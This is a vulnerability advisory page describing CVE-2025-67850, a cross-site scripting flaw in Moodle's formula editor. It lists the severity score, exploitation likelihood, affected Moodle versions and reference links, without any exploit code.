CVE-2025-67850
Last modified
CVE-2025-67850 is a medium-severity vulnerability rated 6.1/10 on the CVSS scale. A flaw was found in moodle. This vulnerability, known as Cross-Site Scripting (XSS), occurs due to insufficient checks on user-provided data in the formula editor's arithmetic expression fields. EPSS estimates a 0.29% chance of exploitation in the next 30 days.
Description
A flaw was found in moodle. This vulnerability, known as Cross-Site Scripting (XSS), occurs due to insufficient checks on user-provided data in the formula editor's arithmetic expression fields. A remote attacker could inject malicious code into these fields. When other users view these expressions, the malicious code would execute in their web browsers, potentially compromising their data or leading to unauthorized actions.
Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Weakness Enumeration
Affected Software
| Vendor | Product | Versions |
|---|---|---|
| Moodle | Moodle | < 4.1.22 |
| Moodle | Moodle | >= 4.4.0, < 4.4.11 |
| Moodle | Moodle | >= 4.5.0, < 4.5.8 |
| Moodle | Moodle | >= 5.0.0, < 5.0.4 |
| Moodle | Moodle | 5.1.0 |
References
- https://access.redhat.com/security/cve/CVE-2025-67850Third Party Advisory
- https://bugzilla.redhat.com/show_bug.cgi?id=2423838Issue Tracking, Third Party Advisory
Timeline
- Published
- Last Modified
- Status
- Analyzed
Frequently Asked Questions
What is CVE-2025-67850?
How severe is CVE-2025-67850?
How do I fix CVE-2025-67850?
Are you affected by CVE-2025-67850?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST